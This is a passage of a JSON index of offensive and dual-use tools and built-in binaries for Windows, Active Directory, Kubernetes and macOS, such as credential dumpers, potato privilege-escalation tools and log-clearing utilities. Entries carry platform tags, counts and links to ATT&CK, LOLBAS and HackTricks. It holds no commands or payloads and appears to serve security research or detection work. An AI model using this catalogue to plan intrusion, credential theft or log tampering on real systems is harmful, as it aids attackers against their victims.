inux","ActiveDirectory","Windows"],"references":["https://github.com/skelsec/pypykatz","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1003/001/"],"count":1},{"id":"wadcoms:RoguePotato","name":"RoguePotato","source":"DAEMON","platform":["Windows","Linux","ActiveDirectory"],"references":["https://github.com/antonioCoco/RoguePotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:sam","name":"sam","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/WazeHell/sam-the-admin","https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing"],"count":1},{"id":"wadcoms:ShadowCoerce","name":"ShadowCoerce","source":"DAEMON","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/ShutdownRepo/ShadowCoerce","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-fsrvp"],"count":1},{"id":"wadcoms:SharpChrome","name":"SharpChrome","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/stealing-credentials","https://attack.mitre.org/techniques/T1555/003/"],"count":1},{"id":"wadcoms:SharpDPAPI","name":"SharpDPAPI","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/GhostPack/SharpDPAPI","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords","https://attack.mitre.org/techniques/T1555/004/"],"count":1},{"id":"wadcoms:SharpGPOAbuse","name":"SharpGPOAbuse","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/FSecureLABS/SharpGPOAbuse","https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e","https://attack.mitre.org/techniques/T1484/001/"],"count":2},{"id":"wadcoms:SharpView","name":"SharpView","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/tevora-threat/SharpView","https://github.com/PowerShellMafia/PowerSploit","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"],"count":1},{"id":"wadcoms:SpoolSample","name":"SpoolSample","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/leechristensen/SpoolSample","https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"],"count":1},{"id":"wadcoms:SweetPotato","name":"SweetPotato","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/CCob/SweetPotato","https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"],"count":1},{"id":"wadcoms:Whisker","name":"Whisker","source":"DAEMON","platform":["Windows","ActiveDirectory"],"references":["https://github.com/eladshamir/Whisker","https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials","https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab"],"count":1},{"id":"daemon:kubectl","name":"kubectl","source":"DAEMON","platform":["Linux","Windows","macOS"],"references":["https://attack.mitre.org/techniques/T1609/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_exec/","https://attack.mitre.org/techniques/T1552/007/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md","https://kubernetes.io/docs/concepts/configuration/secret/","https://attack.mitre.org/techniques/T1611/","https://cloud.hacktricks.wiki/en/pentesting-cloud/kubernetes-security/attacking-kubernetes-from-inside-a-pod.html","https://kubernetes.io/docs/tasks/debug/debug-cluster/kubectl-node-debug/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_debug/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_cp/","https://kubernetes.io/docs/reference/access-authn-authz/authorization/#checking-api-access","https://detection.fyi/sigmahq/sigma/application/kubernetes/audit/kubernetes_audit_rbac_permisions_listing/","https://kubernetes.io/docs/reference/generated/kubectl/kubectl-commands#port-forward","https://attack.mitre.org/techniques/T1090/001/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_create/kubectl_create_token/","https://attack.mitre.org/techniques/T1528/","https://attack.mitre.org/techniques/T1613/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_get/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_config/kubectl_config_current-context/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_config/kubectl_config_get-contexts/","https://kubernetes.io/docs/reference/kubectl/generated/kubectl_auth/kubectl_auth_can-i/"],"count":13},{"id":"daemon:crictl","name":"crictl","source":"DAEMON","platform":["Linux"],"references":["https://kubernetes.io/docs/tasks/debug/debug-cluster/crictl/","https://attack.mitre.org/techniques/T1609/","https://attack.mitre.org/techniques/T1552/007/"],"count":2},{"id":"daemon:ctr","name":"ctr","source":"DAEMON","platform":["Linux"],"references":["https://hacktricks.wiki/en/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.html","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:runc","name":"runc","source":"DAEMON","platform":["Linux"],"references":["https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:docker","name":"docker","source":"DAEMON","platform":["Linux"],"references":["https://docs.docker.com/reference/cli/docker/container/export/","https://docs.docker.com/reference/cli/docker/image/save/","https://attack.mitre.org/techniques/T1005/"],"count":1},{"id":"daemon:nerdctl","name":"nerdctl","source":"DAEMON","platform":["Linux"],"references":["https://github.com/containerd/nerdctl/blob/main/docs/command-reference.md","https://attack.mitre.org/techniques/T1611/"],"count":1},{"id":"daemon:msiexec","name":"msiexec.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msiexec.yml","https://attack.mitre.org/techniques/T1218/007/"],"count":1},{"id":"daemon:curl","name":"curl.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://curl.se/docs/manpage.html","https://curl.se/windows/"],"count":1},{"id":"daemon:tar","name":"tar.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Tar.yml","https://learn.microsoft.com/en-us/windows/tar/"],"count":1},{"id":"daemon:ssh","name":"ssh.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Ssh.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:scp","name":"scp.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Scp.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:msedge","name":"msedge.exe","source":"DAEMON","platform":["Windows","macOS","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Msedge.yml","https://twitter.com/mrd0x/status/1478234484881436672"],"count":1},{"id":"daemon:mpcmdrun","name":"MpCmdRun.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/MpCmdRun.yml","https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/"],"count":1},{"id":"daemon:desktopimgdownldr","name":"desktopimgdownldr.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Desktopimgdownldr.yml","https://www.sentinelone.com/labs/living-off-windows-land-a-new-native-file-downldr/"],"count":1},{"id":"daemon:appinstaller","name":"AppInstaller.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/AppInstaller.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:onedrivestandaloneupdater","name":"OneDriveStandaloneUpdater.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/OneDriveStandaloneUpdater.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:finger","name":"finger.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Finger.yml","https://attack.mitre.org/techniques/T1105/"],"count":1},{"id":"daemon:wsl","name":"wsl.exe","source":"DAEMON","platform":["Windows","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Wsl.yml","https://attack.mitre.org/techniques/T1202/"],"count":1},{"id":"daemon:winget","name":"winget.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Winget.yml","https://learn.microsoft.com/en-us/windows/package-manager/winget/install"],"count":1},{"id":"daemon:devtunnel","name":"devtunnel.exe","source":"DAEMON","platform":["Windows","Linux","macOS"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/cli-commands"],"count":1},{"id":"daemon:teams","name":"Teams.exe","source":"DAEMON","platform":["Windows","macOS","Linux"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Teams.yml","https://attack.mitre.org/techniques/T1218/015/"],"count":1},{"id":"daemon:diskshadow","name":"diskshadow.exe","source":"DAEMON","platform":["Windows"],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Diskshadow.yml","https://attack.mitre.org/techniques/T1003/003/"],"count":1},{"id":"daemon:wevtutil","name":"wevtutil.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil","https://attack.mitre.org/techniques/T1562/002/"],"count":2},{"id":"daemon:powershell","name":"Clear-EventLog","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/clear-eventlog","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/remove-eventlog?view=powershell-5.1","https://attack.mitre.org/techniques/T1070/006/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md","https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/powershell/module/defender/add-mppreference","https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference","https://attack.mitre.org/techniques/T1070/003/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"],"count":6},{"id":"daemon:auditpol","name":"auditpol.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"],"count":1},{"id":"daemon:fsutil","name":"fsutil.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1070/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn"],"count":1},{"id":"daemon:attrib","name":"attrib.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1564/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/attrib"],"count":1},{"id":"daemon:reg","name":"reg.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware"],"count":1},{"id":"daemon:netsh","name":"netsh.exe","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1562/004/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netsh-advfirewall"],"count":1},{"id":"daemon:byovd","name":"BYOVD (vulnerable driver)","source":"DAEMON","platform":["Windows"],"references":["https://attack.mitre.org/techniques/T1068/","https://www.loldrivers.io/"],"count":1},{"id":"loobins:GetFileInfo","name":"GetFileInfo","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/GetFileInfo.yml","https://macosbin.com/bin/getfileinfo"],"count":1},{"id":"loobins:SetFile","name":"SetFile","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/SetFile.yml","https://daringfireball.net/2008/04/the_invisible_bit"],"count":2},{"id":"loobins:caffeinate","name":"caffeinate","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/caffeinate.yml","https://macosbin.com/bin/caffeinate","https://ss64.com/osx/caffeinate.html"],"count":2},{"id":"loobins:chflags","name":"chflags","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/chflags.yml","https://ss64.com/mac/chflags.html","https://macosbin.com/bin/chflags","https://eclecticlight.co/2024/07/03/how-to-hide-files-and-folders/"],"count":2},{"id":"loobins:codesign","name":"codesign","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/codesign.yml","https://www.sentinelone.com/blog/when-apple-admits-macos-malware-is-a-problem-its-time-to-take-notice/","https://ss64.com/mac/codesign.html"],"count":1},{"id":"loobins:csrutil","name":"csrutil","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/csrutil.yml","https://developer.apple.com/forums/thread/4002","https://attack.mitre.org/techniques/T1518/001/","https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf"],"count":5},{"id":"loobins:defaults","name":"defaults","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/defaults.yml","https://macos-defaults.com/","https://www.huntress.com/blog/insistence-on-persistence"],"count":6},{"id":"loobins:disown","name":"disown","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/disown.yml","https://linux.die.net/man/1/disown","https://man7.org/linux/man-pages/man1/bash.1.html","https://www.esentire.com/blog/poseidon-stealer-uses-sora-ai-lure-to-infect-macos"],"count":1},{"id":"loobins:ditto","name":"ditto","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ditto.yml","https://ss64.com/osx/ditto.html","https://www.microsoft.com/en-us/security/blog/2022/12/19/gatekeepers-achilles-heel-unearthing-a-macos-vulnerability/","https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/"],"count":4},{"id":"loobins:dns-sd","name":"dns-sd","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dns-sd.yml","https://themittenmac.com/what-does-apt-activity-look-like-on-macos","https://jonathanmumm.com/tech-it/mdns-bonjour-bible-common-service-strings-for-various-vendors/"],"count":4},{"id":"loobins:dscacheutil","name":"dscacheutil","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscacheutil.yml","https://macosbin.com/bin/dscacheutil","https://ss64.com/osx/dscacheutil.html"],"count":2},{"id":"loobins:dscl","name":"dscl","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dscl.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-red-teaming","https://attack.mitre.org/techniques/T1136/001/"],"count":13},{"id":"loobins:dsconfigad","name":"dsconfigad","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsconfigad.yml","https://macosbin.com/bin/dsconfigad","https://www.unix.com/man-page/osx/8/dsconfigad/"],"count":2},{"id":"loobins:dsexport","name":"dsexport","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/dsexport.yml"],"count":2},{"id":"loobins:funzip","name":"funzip","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/funzip.yml","https://www.uptycs.com/blog/threat-research-report-team/macos-bashed-apples-of-shlayer-and-bundlore","https://linux.die.net/man/1/funzip"],"count":1},{"id":"loobins:hdiutil","name":"hdiutil","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/hdiutil.yml","https://www.microsoft.com/en-us/security/blog/2021/10/28/microsoft-finds-new-macos-vulnerability-shrootless-that-could-bypass-system-integrity-protection/"],"count":6},{"id":"loobins:ioreg","name":"ioreg","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ioreg.yml","https://evasions.checkpoint.com/src/MacOS/macos.html","https://github.com/cedowens/SwiftBelt-JXA/blob/main/SwiftBelt-JXA.js#520"],"count":4},{"id":"loobins:kextstat","name":"kextstat","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/kextstat.yml","https://ss64.com/osx/kextstat.html"],"count":1},{"id":"loobins:last","name":"last","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/last.yml","https://ss64.com/osx/last.html"],"count":3},{"id":"loobins:launchctl","name":"launchctl","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/launchctl.yml","https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/","https://attack.mitre.org/techniques/T1569/001/","https://attack.mitre.org/techniques/T1543/001/","https://unit42.paloaltonetworks.com/unit42-sofacys-komplex-os-x-trojan/"],"count":2},{"id":"loobins:log","name":"log","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/log.yml","https://shellcromancer.io/posts/living-off-of-macos/"],"count":2},{"id":"loobins:lsregister","name":"lsregister","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/lsregister.yml","https://www.jamf.com/blog/remote-mac-exploitation-via-custom-url-schemes/","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation"],"count":3},{"id":"loobins:mdfind","name":"mdfind","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdfind.yml","https://youtu.be/Snwh4mMe-Cg?t=45","https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/"],"count":3},{"id":"loobins:mdls","name":"mdls","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mdls.yml","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"count":3},{"id":"loobins:mktemp","name":"mktemp","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/mktemp.yml","https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/","https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/"],"count":2},{"id":"loobins:networksetup","name":"networksetup","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/networksetup.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be","https://objective-see.org/blog/blog_0x25.html","https://objective-see.org/blog/blog_0x26.html","https://objective-see.org/blog/blog_0x6D.html","https://objective-see.org/blog/blog_0x3C.html","https://objective-see.org/blog/blog_0x6E.html"],"count":11},{"id":"loobins:notifyutil","name":"notifyutil","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/notifyutil.yml","https://brettterpstra.com/2012/07/04/quick-tip-system-wide-notifications-with-notifyutil/","https://developer.apple.com/library/archive/documentation/Darwin/Conceptual/MacOSXNotifcationOv/DarwinNotificationConcepts/DarwinNotificationConcepts.html","https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man3/notify.3.html"],"count":6},{"id":"loobins:nscurl","name":"nscurl","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nscurl.yml","https://www.agnosticdev.com/content/how-diagnose-app-transport-security-issues-using-nscurl-and-openssl","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos"],"count":3},{"id":"loobins:nvram","name":"nvram","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/nvram.yml","https://ss64.com/osx/nvram.html"],"count":1},{"id":"loobins:odutil","name":"odutil","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/odutil.yml","https://macosbin.com/bin/odutil","https://www.unix.com/man-page/osx/1/odutil/"],"count":4},{"id":"loobins:open","name":"open","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/open.yml","https://scriptingosx.com/2017/02/the-macos-open-command/"],"count":2},{"id":"loobins:osacompile","name":"osacompile","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osacompile.yml","https://redcanary.com/blog/mac-application-bundles/"],"count":1},{"id":"loobins:osascript","name":"osascript","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/osascript.yml","https://medium.com/red-teaming-with-a-blue-team-mentality/using-macos-internals-for-post-exploitation-b5faaa11e121","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"count":9},{"id":"loobins:pbpaste","name":"pbpaste","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pbpaste.yml","https://medium.com/@NullByteWht/hacking-macos-how-to-dump-1password-keepassx-lastpass-passwords-in-plaintext-723c5b1c311b","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-b65"],"count":1},{"id":"loobins:pkill","name":"pkill","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/pkill.yml","https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer","https://ss64.com/mac/pkill.html"],"count":5},{"id":"loobins:plutil","name":"plutil","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/plutil.yml","https://scriptingosx.com/2016/11/editing-property-lists/","https://attack.mitre.org/techniques/T1647/"],"count":1},{"id":"loobins:profiles","name":"profiles","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/profiles.yml","https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-mdm"],"count":2},{"id":"loobins:safaridriver","name":"safaridriver","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/safaridriver.yml","https://developer.apple.com/documentation/webkit/about_webdriver_for_safari","https://starlabs.sg/blog/2021/04-you-talking-to-me/"],"count":1},{"id":"loobins:say","name":"say","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/say.yml","https://ss64.com/osx/say.html"],"count":2},{"id":"loobins:screencapture","name":"screencapture","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/screencapture.yml","https://ss64.com/osx/screencapture.html"],"count":1},{"id":"loobins:scutil","name":"scutil","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/scutil.yml","https://macosbin.com/bin/scutil","https://ss64.com/osx/scutil.html"],"count":4},{"id":"loobins:security","name":"security","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/security.yml","https://www.netmeister.org/blog/keychain-passwords.html","https://ss64.com/osx/security.html"],"count":3},{"id":"loobins:sfltool","name":"sfltool","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sfltool.yml","https://www.unix.com/man-page/mojave/1/sfltool/","https://eclecticlight.co/2023/02/15/controlling-login-and-background-items-in-ventura/"],"count":2},{"id":"loobins:sharing","name":"sharing","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sharing.yml","https://ss64.com/mac/sharing.html","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"count":1},{"id":"loobins:snmptrap","name":"snmptrap","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/snmptrap.yml","https://net-snmp.sourceforge.io/","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"count":1},{"id":"loobins:softwareupdate","name":"softwareupdate","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/softwareupdate.yml","https://ss64.com/osx/softwareupdate.html"],"count":2},{"id":"loobins:spctl","name":"spctl","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/spctl.yml","https://disable-gatekeeper.github.io/"],"count":1},{"id":"loobins:sqlite3","name":"sqlite3","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sqlite3.yml","https://github.com/bp88/JSS-Scripts/blob/master/TCC.db%20Modifier.sh","https://redcanary.com/blog/clipping-silver-sparrows-wings/"],"count":3},{"id":"loobins:ssh-keygen","name":"ssh-keygen","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/ssh-keygen.yml","https://medium.com/@D00MFist/generate-keys-or-generate-dylib-loads-c99ed48f323d"],"count":1},{"id":"loobins:streamzip","name":"streamzip","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/streamzip.yml","https://docs.oracle.com/cd/E88353_01/html/E37839/streamzip-1.html"],"count":1},{"id":"loobins:sw_vers","name":"sw_vers","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sw_vers.yml","https://macosbin.com/bin/sw_vers","https://ss64.com/osx/sw_vers.html"],"count":4},{"id":"loobins:swift","name":"swift","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/swift.yml","https://developer.apple.com/swift/blog/?id=18","https://jblevins.org/log/swift","https://krakendev.io/blog/scripting-in-swift","https://blog.eidinger.info/swift-e-runs-code-directly-from-the-command-line","https://ed.com/command-line-swift/"],"count":3},{"id":"loobins:sysadminctl","name":"sysadminctl","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml","https://ss64.com/mac/sysadminctl.html"],"count":7},{"id":"loobins:sysctl","name":"sysctl","source":"LOOBins","platform":["macOS"],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysctl.yml","https://evasions.ch